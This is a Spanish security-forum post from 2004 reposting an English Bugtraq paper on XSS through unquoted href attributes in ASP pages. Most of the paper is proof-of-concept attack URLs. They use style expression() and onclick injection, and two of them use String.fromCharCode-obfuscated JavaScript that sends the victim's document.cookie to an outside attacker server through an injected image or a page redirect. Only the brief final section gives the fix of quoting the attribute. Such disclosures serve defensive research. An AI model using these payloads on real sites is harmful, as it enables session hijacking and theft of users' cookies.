elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Evadiendo algunas protecciones anti XSS en ASP (texto ingles)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Evadiendo algunas protecciones anti XSS en ASP (texto ingles)  (Leído 2,787 veces)
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Evadiendo algunas protecciones anti XSS en ASP (texto ingles)
« en: 30 Julio 2004, 21:50 »

Bueno, por Bugtraq me he encontrado este texto. No esta nada mal, aunque solo habla de ASP y quizas no sea aplicable a PHP (ya que normalmente las paginas que usan PHP si que deniengan las magic quotes). Pero aun asi me parecio interesante, y por eso lo pongo aqui. Copy y paste tal y como me llego al correo.

----------------------------------------------------------------------

Citar
LOVELY QUOTES;
***************************************************************************
Summary: Small XSS Paper about dangerous "href" attributes which don't have
quotes;

Online URL: http://ferruh.mavituna.com/article/?569 (formatted HTML, Easier
to read)


Some web application doesn't care about web standards. Using quotes in
"href" attributes in links is important for standards and also it's
important for security.

Most of websites move SessionId's and other queries over URL. It means what
you write URL will be appeared in page within href attributes. For avoiding
XSS attacks developers Encode HTML characters from queries. Most filtered
strings are [;],["],[javascript],[<],[>].

Developer can fix XSS attacks by filtering these strings but if they don't
use quotes in their links they still vulnerable.


POC & DETAILS;
***************************************************************************

Sample URL;
---------------------------------------------------------------------------
http://[victim]/action.asp?session=123567890


HTML Code;
---------------------------------------------------------------------------
<a
href=default.asp?session=<%=Server.HTMLEncode(Request.Querystring("session")
)%>>Main Page</a>


Possible Attack URL;
---------------------------------------------------------------------------
http://[victim]/?session=12312421"><script>alert(document.domain)</script>

- This will not work because we already filtered HTML.



But this works;
---------------------------------------------------------------------------
http://[victim]/?session=12312421'%20style='width:expression(alert(document.
domain))'%20><script>alert(document.domain)</script>

I injected XSS via style::expression() method because we still can not use
quotes and brackets.


Hijacking onclick action;
---------------------------------------------------------------------------
If you hijack onclick it will be executed when victim clicks to link.

http://[victim]/?session=12312421'%20onclick='alert(document.domain)'


Some Realword Examples;
----------------------------------------------------------------------------
-----

   Stealth hijacking;
   
----------------------------------------------------------------------------
-----
   Inject an image to page which send cookie to attacker server (ie :
http://attacker/ )
   
http://[victim]/?session=12312421'%20style='color:expression(!(document.x)?e
val(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,98,97,99,1
07,103,114,111,117,110,100,73,109,97,103,101,61,34,117,114,108,40,104,116,11
6,112,58,47,47,102,101,114,114,117,104,46,109,97,118,105,116,117,110,97,46,9
9,111,109,47,120,115,115,47,63,34,43,100,111,99,117,109,101,110,116,46,99,11
1,111,107,105,101,43,34,41,34)):0);font-weight:expression(document.x%3Dtrue)
'%20&edinew=3


   Page Redirection;
   
----------------------------------------------------------------------------
-----
   Redirect Page to http://attacker/?[cookies] URL with active user
cookie.

   http://[victim]/?session=12312421'%20style='width:expression(eval(
String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,
111,110,61,39,104,116,116,112,58,47,47,102,101,114,114,117,104,46,109,97,118
,105,116,117,110,97,46,99,111,109,47,120,115,115,47,63,39,43,101,115,99,97,1
12,101,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41)))'


   This code will execute this JS when browser renders link;
   
----------------------------------------------------------------------------
-----
   
document.location='http://ferruh.mavituna.com/xss/?'+escape(document.cookie)



   - I use String.fromCharCode() in these samples because of our victim
filtered out HTML so I still can not use brackets and some other special
chars. Go http://ferruh.mavituna.com/stringfromcharcode.asp for online
String.fromCharCode() generator.

   

Compatibility Notes;
***************************************************************************
expression() is only compatible with IE5+, but for other browsers you may
can use action hijacking methods or other smarter methods.


HOW TO PROTECT?;
***************************************************************************
Use quotes to fix this problem.

Secure HTML Code;
<a
href="default.asp?session=<%=Server.HTMLEncode(Request.Querystring("session"
))%>">Main Page</a>



AUTHOR;
***************************************************************************
Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com
ferruh{at}mavituna{dot}com


Date: 5/9/2004

PGP Key: http://ferruh.mavituna.com/pgpkey.asc
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Evadiendo Web Application Firewalls con SQLMap
Nivel Web
hkm 0 2,654 Último mensaje 1 Septiembre 2011, 00:28
por hkm
Evadiendo los mejores antivirus 0/42
Hacking Avanzado
x4r0r 0 1,044 Último mensaje 22 Octubre 2012, 05:10
por x4r0r
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines